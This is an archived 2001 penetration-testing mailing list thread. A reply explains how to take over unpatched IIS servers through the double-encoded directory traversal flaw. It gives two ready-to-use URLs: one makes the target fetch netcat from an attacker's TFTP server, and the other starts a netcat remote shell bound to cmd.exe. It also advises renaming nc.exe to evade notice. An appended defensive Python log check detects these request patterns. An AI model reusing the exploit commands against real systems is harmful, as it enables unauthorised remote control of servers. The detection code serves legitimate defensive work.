Penetration Testing mailing list archives
Re: Ideas on netcat
From: "Assess" <assess () cmsecurenet com>
Date: Mon, 27 Aug 2001 18:01:35 -0400
This is a simple way to take over an IIS web server without the unicode patch. It requires that the firewall has TFTP outbound active and an inbound port available with nothing loaded on it. While several things must occur for this to work, I have had it work twice out of ten assessments, so the odds may still be good. You may want to rename nc.exe to something less obvious.

Get Netcat from your tftp server

http://VICTIMADDRESSHERE/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp.exe+-i+TFTPSERVERADDRESSHERE+GET+nc.exe+c:\nc.exe

Start netcat on port 23 or any port that is open inbound, and unused, through the firewall. TCP port 53 works more often than not if DNS has been configured incorrectly.

http://VICTIMADDRESS/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+nc%20-l%20-p%2023%20-t%20-e%20cmd.exe

Telnet to the port on the target system. If it works you should have a c:\ prompt.

----- Original Message -----
From: "Vo0d0o" <voodooo () rediffmail com>
To: <pen-test () securityfocus com>
Sent: Friday, August 24, 2001 2:29 AM
Subject: Ideas on netcat

To all netcat gurus,

I have been experimenting on netcat for a few days and searching almost everyday on netcat for some possible uses, but in vain. As far as I know, no site is giving some other uses of netcat pertaining to pen-testing ...other than the usual *README* file which I find too basic. I would be grateful if anybody could throw some light on uses of netcat in pen-testing.

Thanks in advance.

Cheers,
Kartik.

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service.
For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
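Added example, not part of the original post or thread: a small log-review check for the request pattern in the message above (a `%255c` that only becomes a backslash after two URL-decode passes, plus a command interpreter in the URL). The function names and the sample request lines are constructed for illustration; the sample lines reuse the post's own placeholders.

```python
import re
from urllib.parse import unquote

# Constructed sample request URIs, as they might appear in a web server log.
SAMPLE_REQUESTS = [
    "/scripts/..%255c../..%255c../winnt/system32/cmd.exe"
    "?/c+tftp.exe+-i+TFTPSERVERADDRESSHERE+GET+nc.exe+c:\\nc.exe",
    "/scripts/..%255c../winnt/system32/cmd.exe"
    "?/c+nc%20-l%20-p%2023%20-t%20-e%20cmd.exe",
    "/images/logo%20small.gif",        # benign: single-encoded space
    "/default.asp?q=100%25+cotton",    # benign: encoded literal percent sign
]

TRAVERSAL = re.compile(r"\.\.[\\/]")                     # ../ or ..\
SHELL = re.compile(r"(?i)\b(cmd|tftp|nc)\.exe\b")        # tools named in the post


def decode_passes(uri, max_passes=3):
    """Return [raw, decoded once, decoded twice, ...] until the text is stable."""
    passes = [uri]
    for _ in range(max_passes):
        decoded = unquote(passes[-1])
        if decoded == passes[-1]:
            break
        passes.append(decoded)
    return passes


def classify(uri):
    """Return a sorted list of findings for one logged request URI."""
    passes = decode_passes(uri)
    final = passes[-1]
    findings = set()
    # Three entries means a second decode still changed the text:
    # an escape such as %255c was itself percent-encoded.
    if len(passes) >= 3:
        findings.add("double-encoded")
    if TRAVERSAL.search(final):
        findings.add("traversal")
    if SHELL.search(final):
        findings.add("shell-command")
    return sorted(findings)


if __name__ == "__main__":
    for request in SAMPLE_REQUESTS:
        print(classify(request) or ["clean"], request)
```

Requests that trip all three findings are worth correlating with outbound TFTP and new listeners on the web server, the two firewall conditions the post says the technique depends on.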
Current thread:
- Ideas on netcat Vo0d0o (Aug 27)
- Re: Ideas on netcat Assess (Aug 29)
- Re: Ideas on netcat Dave Aitel (Aug 29)
- Re: Ideas on netcat Penetration Testing (Aug 29)
- Re: Ideas on netcat Pawel Krawczyk (Aug 29)
- Re: Ideas on netcat BS (Aug 29)
- Re: Ideas on netcat Forrest Rae (Aug 29)
- Re: Ideas on netcat Jose Nazario (Aug 29)